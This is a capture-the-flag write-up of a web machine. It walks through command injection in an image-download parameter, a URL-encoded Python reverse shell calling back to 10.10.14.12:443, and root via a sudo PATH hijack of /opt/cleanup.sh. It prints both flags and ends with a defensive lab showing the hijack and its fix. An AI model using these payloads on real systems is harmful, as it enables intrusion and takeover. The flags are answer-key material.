Write-up author: jon-brandy
- First, let's check all open ports and their services on the given host.
RESULT
- Based on the output, it seems the machine is running a web application.
- So let's open the webapp.
RESULT
- Let's click this:
RESULT
- Well we don't have any creds, let's check the page source.
RESULT
- Let's check the `.js` file.
RESULT
- Got a hint there, open the link then.
RESULT
- It seems we can download any image we click here.
- Hence, let's capture the download request in Burp Suite and send it to Repeater.
RESULT
- To check whether it's vulnerable to command injection, let's append `;id` to the value of the `filetype` parameter.
RESULT
- Now let's try to inject a command for a reverse shell. I used this command from `hacktools`.

```
python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.12%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'
```
- Now set up a listener on port 443. Then paste the payload after `jpg;` and click send.
- Now press `ctrl-d`.
RESULT
- Let's find all the flags!
- Got the user flag!
e89b54a9041e03ea2ea5148f38d1413d
- Then go for the root now.
- Since we're not root, gotta find a way.
- Find a bash script in the `opt` directory.
- Actually I'm stuck here, so I did a small outsource about this challenge and found out that we have to run this command in order to get the root mode:

```bash
sudo -l # check our available command
echo bash > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
```
RESULT
- Got the root flag!
09472dbb86cfe57789293cef8965aa07
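
Why the root step above works, and how the script side is fixed, shown as an added example that is not part of the original write-up or the machine's own script. It assumes the privileged script calls `find` by bare name; the file names `cleanup_vuln.sh` and `cleanup_safe.sh` and the `planted` marker are constructed for this lab.

```shell
#!/usr/bin/env bash
# Constructed lab in a temp dir: no sudo, nothing under /opt is touched.
# Assumption: the privileged script calls `find` by bare name.

make_lab() {
  lab=$(mktemp -d)
  # Stand-in for the user-created file named "find"; it only prints a marker.
  printf '#!/bin/sh\necho planted\n' > "$lab/find"
  cat > "$lab/cleanup_vuln.sh" <<'EOF'
#!/bin/sh
# Bare command name: resolved through whatever PATH the caller supplies.
find . -maxdepth 0 -name nomatch
EOF
  cat > "$lab/cleanup_safe.sh" <<'EOF'
#!/bin/sh
# Pin PATH before the first lookup so the caller's value is ignored.
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH
find . -maxdepth 0 -name nomatch
EOF
  chmod +x "$lab/find" "$lab/cleanup_vuln.sh" "$lab/cleanup_safe.sh"
  echo "$lab"
}

# Run a lab script the way the write-up invokes the real one:
# current directory placed first in PATH.
run_with_caller_path() {
  (cd "$LAB" && PATH="$LAB:$PATH" "./$1" 2>/dev/null)
}

LAB=$(make_lab)
trap 'rm -rf "$LAB"' EXIT

# The vulnerable script runs the planted file; the hardened one runs the
# system find, which prints nothing for this query.
echo "vulnerable script ran: $(run_with_caller_path cleanup_vuln.sh)"
echo "hardened script ran:   $(run_with_caller_path cleanup_safe.sh)"
```

sudo applies its normal environment restrictions to a command-line `PATH=` unless the sudoers entry carries the `SETENV` tag or the `setenv` option, so dropping that grant and setting `secure_path` closes the same hole from the other side.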